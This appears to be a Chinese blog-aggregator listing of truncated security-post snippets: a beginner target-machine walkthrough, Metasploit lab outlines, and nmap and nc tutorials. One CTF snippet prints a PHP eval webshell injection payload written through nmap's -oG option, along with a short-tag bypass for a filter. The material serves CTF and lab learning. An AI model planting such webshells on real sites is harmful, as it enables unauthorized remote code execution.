靶机地址:这里 靶机难度:初级 靶机发布日期:12 Jul 2018 知识点: nmap端口扫描 弱口令登入 SUID提权 启动靶机,用nmap扫描获得靶机IP 192.168.133.164 扫描端口,开放了22,80,111端口 访问80端口,没有太大发现 在dirb发现了admin的目录 访问 ...
分类:
其他好文 时间:
2020-05-30 11:08:18
阅读次数:
68
和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o ...
分类:
其他好文 时间:
2020-05-29 19:49:08
阅读次数:
352
一、实验名称 MSF基础应用 二、实验目的 掌握Metasploit的基本应用方式,重点常用的三种攻击方式的思路。 三、实验内容 1.一个主动攻击实践,如ms08_067 2. 一个针对浏览器的攻击,如ms11_050 3.一个针对客户端的攻击,如Adobe 4.成功应用任何一个辅助模块 四、基础知 ...
分类:
其他好文 时间:
2020-05-29 17:59:56
阅读次数:
123
本篇简要介绍下Nmap NSE脚本的使用。 NSE脚本分类 nmap脚本主要分为以下13类,在扫描时可根据需要设置--script=[脚本] 来使用指定的脚本进行扫描检测任务。 auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/ ...
分类:
其他好文 时间:
2020-05-29 12:17:49
阅读次数:
107
1.nmap语法 -A 全面扫描/综合扫描 例如:nmap -A 127.0.0.1 扫描指定段 例如:nmap 127.0.0.1-200&nmap 127.0.0.1/24 2.Nmap 主机发现 -sP -sP ping扫描 例如:nmap -sP 127.0.0.1 -P0 -P0 无pin ...
分类:
其他好文 时间:
2020-05-26 01:34:50
阅读次数:
79
文件位置 /usr/share/metasploit-framework/modules/ 技术功能模块介绍 exploits 利用系统漏洞进行攻击的操作,此模块对应每一个具体漏洞的攻击方法 payload 成功exploit之后,真正在目标系统执行的代码攻击 evasion 专门针对windows ...
分类:
Web程序 时间:
2020-05-23 16:50:33
阅读次数:
120
下载链接:https://nmap.org/download.html nc传输(一种网络的数据流重定向) nc所做的就是在两台电脑之间建立tcp或udp链接,并在两个端口之间传输数据流,是一种网络的数据流重定向 使用dd结合nc命令网络克隆磁盘分区 主机: dd if=/dev/vda | gzi ...
分类:
其他好文 时间:
2020-05-23 16:40:20
阅读次数:
95
拍摄于某工位 NMAP端口扫描工具使用 NMAP可以扫描主机的端口及对应的服务,操作系统版本等,以下对NMAP扫描端口和服务做简单介绍。 工具/原料 电脑 nmap 方法/步骤 在安装包中双击nmap-7.40-setup.exe进行安装,依次点击下一步即可。 安装完成后桌面会显示nmap图标。 打 ...
分类:
其他好文 时间:
2020-05-19 10:48:47
阅读次数:
385
nmap 报错问题解决configure: error: Neither flex nor lex was found. ...
分类:
系统相关 时间:
2020-05-19 00:28:07
阅读次数:
297
1、下载地址 https://nmap.org/download.html 2、下载之后进行安装 选择I Agree 后,建议全选,特别是zenmap,这个是图形化界面,不喜欢命令行格式的可以用zenmap去扫描端口 3、配置环境变量,将nmap的安装路径配置到path环境变量 4、dos命令中输入 ...
分类:
其他好文 时间:
2020-05-15 13:33:14
阅读次数:
81
